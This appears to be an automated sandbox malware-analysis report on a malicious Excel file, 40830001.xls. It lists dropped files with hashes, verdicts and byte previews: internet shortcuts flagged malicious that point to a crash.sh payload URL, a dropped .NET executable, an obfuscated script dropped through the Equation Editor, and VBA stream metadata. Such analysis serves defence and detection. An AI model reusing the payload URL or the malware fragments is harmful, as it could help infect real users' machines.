                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131072
                                                      Entropy (8bit):0.02552939605308332
                                                      Encrypted:false
                                                      SSDEEP:6:I3DPcVxzFvxggLRjub8wglJ5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPEVpP2alLvYg3J/
                                                      MD5:279E09C81B4FEC0CF240599FFF163B45
                                                      SHA1:55065B02426FA69BDF77F82DD91A908FA5FBB40F
                                                      SHA-256:7AFDBEFAFA96C10F77BC65686A4083CEAFF62A211BA0216384C7030C8F29B8DC
                                                      SHA-512:CD827EF02D04710569ED9231B7020565A4F7A77B0183B6AAB77FA9504BAD93FBD8C385F96CF294EFA28F279BDE016F30B810C2898149EA1715319C56CDE064D4
                                                      Malicious:false
                                                      Preview:......M.eFy...z..a...]M...I.k.;S,...X.F...Fa.q............................t...S..H.....-:.........C...d..O..w..{S.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131072
                                                      Entropy (8bit):0.02560424029065332
                                                      Encrypted:false
                                                      SSDEEP:6:I3DPcD3Ar9vxggLRWnGQ8kuRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKAdyHGvYg3J/
                                                      MD5:3D1B956F9FA3EC5031E267CB671773C9
                                                      SHA1:99A31C241AE4B2E0F87E35E1FD1F09DBF270F8C3
                                                      SHA-256:24DFC9C3EF8BCD182FD20A9054F42237CB04A70EEFE91F8D787036039C3D7C6B
                                                      SHA-512:C9FEFED8628A1B101445D0157A4080CF623D6738F7FEB46A17E8AC49F736CE0AE0A15F508D1BD0D96EB3D13709EB6CB9A0497D1E15217623795839BECEE9D3E5
                                                      Malicious:false
                                                      Preview:......M.eFy...z. .T=V.K...d..D&S,...X.F...Fa.q.............................d$t.fZI.;=................p.B.A]g'e.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):16384
                                                      Entropy (8bit):0.8793237011532438
                                                      Encrypted:false
                                                      SSDEEP:48:mSpjgJPWirkjBaX5YKX+lxGu0FxguGFzg:m8jgJPWx6GqaxGukGuG9g
                                                      MD5:314C2D25DD5DB4329FC682BAD485361C
                                                      SHA1:B53C3BA2877091492A3F8E5A0742DE0D9F8C3283
                                                      SHA-256:7A8DC7A04939AC2D75C967DA6DE15A1CC79F727FEED26D74700A61CBF72A7447
                                                      SHA-512:42C2A496C8656C70E054B4AE532A20AC70128E37A643FB4336B3D37E8ACD68A5D3FFEE3CB6E906BF4DC7B48AA595BE570309C86FFF4714E79E4FB6F9F0E9D178
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://crash.sh/>), ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):43
                                                      Entropy (8bit):4.315231324217973
                                                      Encrypted:false
                                                      SSDEEP:3:HRAbABGQYm2fSQV:HRYFVm4Sy
                                                      MD5:1307D64401D7D605511C3FEB61577E11
                                                      SHA1:3F918D3F36C9F86517C56E5789F20000F2868127
                                                      SHA-256:A4009B753241124E9E177EA58A522D4233797C37BF1771F2847F8F295FACA3E0
                                                      SHA-512:0B6948C6604B101820F236AF8A564BAB4D80F7052BB52064E8C7F516416741A4823F60C6CC23478F81F05C4BDD759C2F2C60D99C2A23B0A0E3E895948AD6FB16
                                                      Malicious:true
                                                      Preview:[InternetShortcut]..URL=https://crash.sh/..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Generic INItialization configuration [xls]
                                                      Category:modified
                                                      Size (bytes):80
                                                      Entropy (8bit):4.51688274496351
                                                      Encrypted:false
                                                      SSDEEP:3:bDmnS9QumVC3WV/ULUmMJVdS/ULUv:byS9iX/UKJ3S/UC
                                                      MD5:F922B992DABD7E84B550457255F8B4E6
                                                      SHA1:1DCFD20AD261AED65C0814D5E738B6D976DA5BEB
                                                      SHA-256:527D3F0AE5123F12308FEE2097FA532231917BC42A3BDDD18A7D470FB19CB1D7
                                                      SHA-512:8099A0DCF9478DFB510E91930CBCBDE040E2FA3867D1774B588EE3F87F1A7DA9A6511AB7FA94A6B67A66BA541B365ECFFE614A9D566BF445161113DF64E1B213
                                                      Malicious:false
                                                      Preview:[folders]..udMVqm.url=0..crash.sh.url=0..40830001.LNK=0..[xls]..40830001.LNK=0..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://crash.sh/udMVqm>), ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):49
                                                      Entropy (8bit):4.598904996955671
                                                      Encrypted:false
                                                      SSDEEP:3:HRAbABGQYm2fSQ9vn:HRYFVm4Sin
                                                      MD5:5600438ECF077C640FB494D7BCD2F49C
                                                      SHA1:FA843E4478D9138229279BAB886D2795C342F781
                                                      SHA-256:515D2C37F9676E7CEFBA15139FEA925AC9FBC58EC44B5871AFCE05FDEA67318B
                                                      SHA-512:2157D7037A0604B4D784952914D32DF287B2147EC9C3137CBEDAAA7CDD60DA16C709EDFBFD904A48F61620DDF5F47D70424AFCEDCD918D8833438BD429485526
                                                      Malicious:true
                                                      Preview:[InternetShortcut]..URL=https://crash.sh/udMVqm..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020303
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyWzUbGabuW0iWVlfln:vdsCkWtqb9bt2dl
                                                      MD5:B33B8593034E436C71DA5820F309CDF3
                                                      SHA1:61021B359E9ECBEBA3A941C907F03C4C7002F58E
                                                      SHA-256:82732B2A3E81F7CBE7A72A4DDA5679175EB54FF45A331B743F768739E4E45975
                                                      SHA-512:2CA8AB8261B68676E34E0B1D7BCD14064B7EFE9AB28C6071FEBB13B056D547782F5DECE788115AFFF9EC35A85B8BF6957DA725E82D0E276419FA64AF9FC79D85
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1@..............2@.............@3@..............3@.....z.......p4@.....x...
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):64704
                                                      Entropy (8bit):6.02370063609959
                                                      Encrypted:false
                                                      SSDEEP:768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
                                                      MD5:8FE9545E9F72E460723F484C304314AD
                                                      SHA1:3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
                                                      SHA-256:D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
                                                      SHA-512:0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                      Joe Sandbox View:
                                                      • Filename: capcut Setup-x64.msi, Detection: malicious, Browse
                                                      • Filename: 7YZlAbfKMg.rtf, Detection: malicious, Browse
                                                      • Filename: Product Inquiry466789.xls, Detection: malicious, Browse
                                                      • Filename: A24-00342B139336 #TW_Inquiry.xls, Detection: malicious, Browse
                                                      • Filename: LgTFM1JlJu.rtf, Detection: malicious, Browse
                                                      • Filename: #20240627_Edlen_B.xls, Detection: malicious, Browse
                                                      • Filename: #20240627_Edlen_A.xls, Detection: malicious, Browse
                                                      • Filename: Requirements.xla.xlsx, Detection: malicious, Browse
                                                      • Filename: vns.exe, Detection: malicious, Browse
                                                      • Filename: Doc606112.xls, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):339146
                                                      Entropy (8bit):7.999527119862136
                                                      Encrypted:true
                                                      SSDEEP:6144:VsBND2PSq1ECXV18AlJpzJZo/JubMz28YtTqxTNth5vG+rlQ:iB52PSq1xOb/JhnYtTqxTza+C
                                                      MD5:7F672F88838E6C8E8B2BAC92939F270F
                                                      SHA1:D9B47CB968EAFE3C1C94EBD6B9C66CED01EE61A0
                                                      SHA-256:5F65E9BEBC1D29DA1D85F0FCB0DE63F68D6AE347494006BD10E9A2DE2D8E2AF2
                                                      SHA-512:4D52087C364B2BF6C3841D2E2CF7169DDC1AFE368DA33BA013889FD6573E290DD7AB9729AD2250864E709BB464B81F28196762C57CD0A5AE6846D9DB4BEDEE0A
                                                      Malicious:false
                                                      Preview:.&..K..d...C...x.......'....x..rmS....L.5..U. b...q.2=.>.R=..;.....Sl.k....gbQ.Zl=9E...8..E|D.....U.Nw..qf.S.....s3^..o+...?ag.%....".m..{.l.S.$.h'.....{.;...G.......W..tO..]..;3.Z......=v..C9E...`/.W./.FxJ...E..J..q....b.v...p.K@.n..D.....0.t....Z.6.MB.|hQ........,...j.W.,^..[l-..;...oh.uU6.N.....TZQ...0...S^d...k.R....QjF.J..D)x.....>..W.(..[[h..`.%+@..y(...tW..JVo...H#.y{.I....45..'k..j..r.....WR6t...i.= Yr......4n.*U.}x.M+:.C`.G3.>...;..$j.....!...1.....ab.8...,.....8]....i.........4.X.._..<.......N.0Q.........+a)..mP.....8p........~l^K..C'.A.......<,b..B..)..Q..x.YS..h..!9}`D..3.$.EH.Q..|.M[...}W..{.W.\.M.W..2.l.(....J]O...SY..M. ......w^...TlN..(..|C..'o.O.F.;?..Ix..H....z..(.o..ua..^?............zq5...>.....V|.Ec:...7....d[.s..@...mT-.3....z..%.Y.".3.W..B....!...H....J..v.pz.b`...e..]y..fz.d..mj`.r.qIO8h.8._....M./.e6.:..o.#. u(....E.#.-=Pr......wO.~..J6".7..)..i..Lh.i...i.5.x..iI....V.D.0*....O.<.F...\=...=...0h.........+!zTz
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):183084
                                                      Entropy (8bit):3.886576284833851
                                                      Encrypted:false
                                                      SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                      MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                      SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                      SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                      SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                      Malicious:true
                                                      Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 31 14:51:32 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):583680
                                                      Entropy (8bit):7.982788107216866
                                                      Encrypted:false
                                                      SSDEEP:12288:alVkeyoayzIt5bTbBkBl9bMt350kwuyQrfEBtWOouFl6V:agwzOTlil9sGkLPEBtXC
                                                      MD5:69D815B3C5C65DA9CB98470EE87F5690
                                                      SHA1:B5633BDD4EBD3050F0A1583D9CEE311364E193E4
                                                      SHA-256:FE7AEEC88AA981F42A10D6510222CB44150B537C57D5803DFECBFD96FE0321D3
                                                      SHA-512:BBA64D01BA34FEBF0BC6031C160BD134ABBAA17DF3E46EAAEE04A501F7C9EAD2CB9277453ECACD136FCC71E4B40FB53E158ADF6322C4C76710ECD09A30604E4C
                                                      Malicious:true
                                                      Preview:......................>...................................6...................x.......z.......|.......~...............................................................................................................................................................................................................................................................................................................................................................................................................................r................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...........q...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...y.......z...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 31 14:51:32 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):583680
                                                      Entropy (8bit):7.982788107216866
                                                      Encrypted:false
                                                      SSDEEP:12288:alVkeyoayzIt5bTbBkBl9bMt350kwuyQrfEBtWOouFl6V:agwzOTlil9sGkLPEBtXC
                                                      MD5:69D815B3C5C65DA9CB98470EE87F5690
                                                      SHA1:B5633BDD4EBD3050F0A1583D9CEE311364E193E4
                                                      SHA-256:FE7AEEC88AA981F42A10D6510222CB44150B537C57D5803DFECBFD96FE0321D3
                                                      SHA-512:BBA64D01BA34FEBF0BC6031C160BD134ABBAA17DF3E46EAAEE04A501F7C9EAD2CB9277453ECACD136FCC71E4B40FB53E158ADF6322C4C76710ECD09A30604E4C
                                                      Malicious:false
                                                      Preview:......................>...................................6...................x.......z.......|.......~...............................................................................................................................................................................................................................................................................................................................................................................................................................r................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...........q...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...y.......z...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Aug 30 00:43:19 2024, Security: 1
                                                      Entropy (8bit):7.961830954141762
                                                      TrID:
                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                      File name:40830001.xls
                                                      File size:583'168 bytes
                                                      MD5:a230c030160d04f7fa28fa4d48d71584
                                                      SHA1:802288792e4b687e1f7f9cfb48086bc28e0152e3
                                                      SHA256:cb92d320fc9bc674e8d37ceeebf0363f8e96dd67ef4ef543b3348f96ef567e5f
                                                      SHA512:7259066fd1b2ff42551cc1d27fae07596e90992e11b12834a51cdbd0190360d44ebb6d8011e245738e2ebbe394fd75b337dfb2d0e396bc9456d1186b39f198cb
                                                      SSDEEP:12288:Gl3meS+nx6mzcyd9cOSaH9bodJMC6lVMBtDh30zHJiUQ3U1wC:G1meS+rwyzcOSa5odJVrliHuU
                                                      TLSH:AEC4239333F5CF13CCD3387744C5DA9BA6A5BD15AF22D96B72817B1DAA3039088045AB
                                                      File Content Preview:........................>...................................6...................y.......{.......}..............................................................................................................................................................
                                                      Icon Hash:276ea3a6a6b7bfbf
                                                      Document Type:OLE
                                                      Number of OLE Files:1
                                                      Has Summary Info:
                                                      Application Name:Microsoft Excel
                                                      Encrypted Document:True
                                                      Contains Word Document Stream:False
                                                      Contains Workbook/Book Stream:True
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:False
                                                      Flash Objects Count:0
                                                      Contains VBA Macros:True
                                                      Code Page:1252
                                                      Author:
                                                      Last Saved By:
                                                      Create Time:2006-09-16 00:00:00
                                                      Last Saved Time:2024-08-29 23:43:19
                                                      Creating Application:Microsoft Excel
                                                      Security:1
                                                      Document Code Page:1252
                                                      Thumbnail Scaling Desired:False
                                                      Contains Dirty Links:False
                                                      Shared Document:False
                                                      Changed Hyperlinks:False
                                                      Application Version:786432
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                      VBA File Name:Sheet1.cls
                                                      Stream Size:977
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af bf 1b 6e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Attribute VB_Name = "Sheet1"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                      VBA File Name:Sheet2.cls
                                                      Stream Size:977
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af bf d6 df 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Attribute VB_Name = "Sheet2"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                      VBA File Name:Sheet3.cls
                                                      Stream Size:977
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af bf 45 c8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Attribute VB_Name = "Sheet3"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                      VBA File Name:ThisWorkbook.cls
                                                      Stream Size:985
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af bf 1f dc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Attribute VB_Name = "ThisWorkbook"
                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:114
                                                      Entropy:4.25248375192737
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                      General
                                                      Stream Path:\x5DocumentSummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:244
                                                      Entropy:2.889430592781307
                                                      Base64 Encoded:False
